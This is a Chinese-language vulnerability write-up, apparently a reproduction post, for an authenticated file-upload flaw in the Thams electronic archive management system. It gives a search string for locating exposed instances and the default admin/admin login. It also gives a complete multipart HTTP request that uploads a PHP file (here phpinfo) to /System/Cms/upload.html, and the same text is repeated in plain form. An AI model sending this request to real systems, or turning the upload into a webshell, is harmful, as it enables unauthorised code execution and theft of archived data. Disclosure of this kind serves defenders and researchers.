Thams档案管理系统 upload.html 后台文件上传漏洞

# Thams档案管理系统 upload.html 后台文件上传漏洞 ## 漏洞描述 Thams软件系统有限公司（以下简称“Thams软件”）是中国领先的行业解决方案和IT服务提供商。 Thams电子档案管理系统后台存...

Thams档案管理系统 upload.html 后台文件上传漏洞
================================

漏洞描述
----

Thams软件系统有限公司（以下简称“Thams软件”）是中国领先的行业解决方案和IT服务提供商。  
Thams电子档案管理系统后台存在文件上传漏洞。攻击者可利用漏洞获取数据库敏感信息。

漏洞影响
----

Thams电子档案管理系统

网络测绘
----

app="Thams档案管理系统"

漏洞复现
----

登录页面

![img](../../../.vuepress/public/img/1633168580711-690386c5-48bd-4162-b6ed-763c9f57ee73-8540126.png)

使用默认口令登录后台 admin/admin, 发送请求包

![img](https://shs3.b.qianxin.com/butian_public/f7091388dca9dcd6bb055cd39ea34016742ce138b3a59.jpg)

```php
POST /System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 614
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT

------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="userID"

admin
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="fondsid"

1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="comid"

1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="token"

6b79a77180e9ec3a7ca351ebe54641a2
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="files[]"; filename="phpinfo.php"
Content-Type: text/php

<?php phpinfo();?>
------WebKitFormBoundarygIRYWNxmDYiZBguT--
```

![img](https://shs3.b.qianxin.com/butian_public/f720138fc2bc5ce93ab18b78f0a1fc179c1c264f44ccb.jpg)

回显路径即为上传成功的文件路径

![img](https://shs3.b.qianxin.com/butian_public/f52083450365dbf2c9df922de7c1fdd23b5ae982ce90d.jpg)

Thams档案管理系统 upload.html 后台文件上传漏洞

漏洞描述

Thams软件系统有限公司（以下简称“Thams软件”）是中国领先的行业解决方案和IT服务提供商。
Thams电子档案管理系统后台存在文件上传漏洞。攻击者可利用漏洞获取数据库敏感信息。

漏洞影响

Thams电子档案管理系统

网络测绘

app="Thams档案管理系统"

漏洞复现

登录页面

使用默认口令登录后台 admin/admin, 发送请求包

POST /System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 614
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT

------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="userID"

admin
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="fondsid"

1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="comid"

1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="token"

6b79a77180e9ec3a7ca351ebe54641a2
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="files[]"; filename="phpinfo.php"
Content-Type: text/php

<?php phpinfo();?>
------WebKitFormBoundarygIRYWNxmDYiZBguT--

回显路径即为上传成功的文件路径

发表于 2024-07-12 18:47:36
阅读 ( 1677 )
分类：Web应用

站长统计